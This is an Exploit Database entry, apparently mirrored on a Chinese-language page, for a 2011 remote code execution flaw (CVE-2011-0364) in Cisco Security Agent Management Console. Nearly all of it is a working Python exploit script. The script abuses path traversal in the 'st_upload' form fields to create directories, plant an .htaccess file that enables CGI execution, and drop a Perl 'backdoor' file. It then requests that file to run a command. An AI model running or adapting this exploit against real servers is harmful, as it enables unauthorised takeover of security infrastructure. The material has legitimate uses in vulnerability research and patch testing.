Cisco Security Agent Management Console – ‘st_upload’ Remote Code Execution

• Exploit Database
• 10 阅读

• 作者： Gerry Eisenhaur
  日期： 2011-04-12
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17155/

• #!/usr/bin/env python
  # Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
  # gerry eisenhaur <gerry.eisenhaur _at_ gmail.com>
  
  import httplib
  import mimetools
  import StringIO
  
  _boundary = mimetools.choose_boundary()
  _host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
  _csamc = "192.168.0.108"
  
  # we need to enable some scripting to get command access
  htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
  perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
  backdoor = "exec \"calc.exe\";"
  
  def send_request(params=None):
  buf = StringIO.StringIO()
  headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}
  
  for(key, value) in params.iteritems():
  buf.write('--%s\r\n' % _boundary)
  buf.write('Content-Disposition: form-data; name="%s"' % key)
  buf.write('\r\n\r\n%s\r\n' % value)
  buf.write('--' + _boundary + '--\r\n\r\n')
  body = buf.getvalue()
  
  conn = httplib.HTTPSConnection(_csamc)
  conn.request("POST", "/csamc60/agent", body, headers)
  response = conn.getresponse()
  print response.status, response.reason
  conn.close()
  
  def main():
  ### Build up required dir tree
  dirtree = ["../bin/webserver/htdocs/diag/bin",
   "../bin/webserver/htdocs/diag/bin/webserver",
   "../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
  _params = {
  'host_uid': _host_uid,
  'jobname': None,
  'host': "aa",
  'diags': " ",
  'diagsu': " ",
  'profiler': " ",
  'extension': "gee",
  }
  for path in dirtree:
  print "[+] Creating directory: %s" % path
  _params['jobname'] = path
  send_request(_params)
  
  ### Done building path, drop files
  print "[+] Dropping .htaccess"
  send_request({
  'host_uid': _host_uid,
  'jobname': '',
  'host': "/../bin/webserver/",
  'diags': "",
  'diagsu': "",
  'profiler': htaccess,
  'extension': "/../.htaccess",
  })
  
  print "[+] Dropping payload"
  send_request({
  'host_uid': _host_uid,
  'jobname': '',
  'host': "/../bin/webserver/htdocs/gerry",
  'diags': perl_path,
  'diagsu': "",
  'profiler': backdoor,
  'extension': "/../exploit.gee",
  })
  
  print "[+] Done, Executing dropped file."
  try:
  conn = httplib.HTTPSConnection(_csamc, timeout=1)
  conn.request("GET", "/csamc60/exploit.gee")
  response = conn.getresponse()
  print response.status, response.reason
  print response.read()
  except httplib.ssl.SSLError:
  pass
  print "[+] Finished."
  
  if __name__ == '__main__':
  main()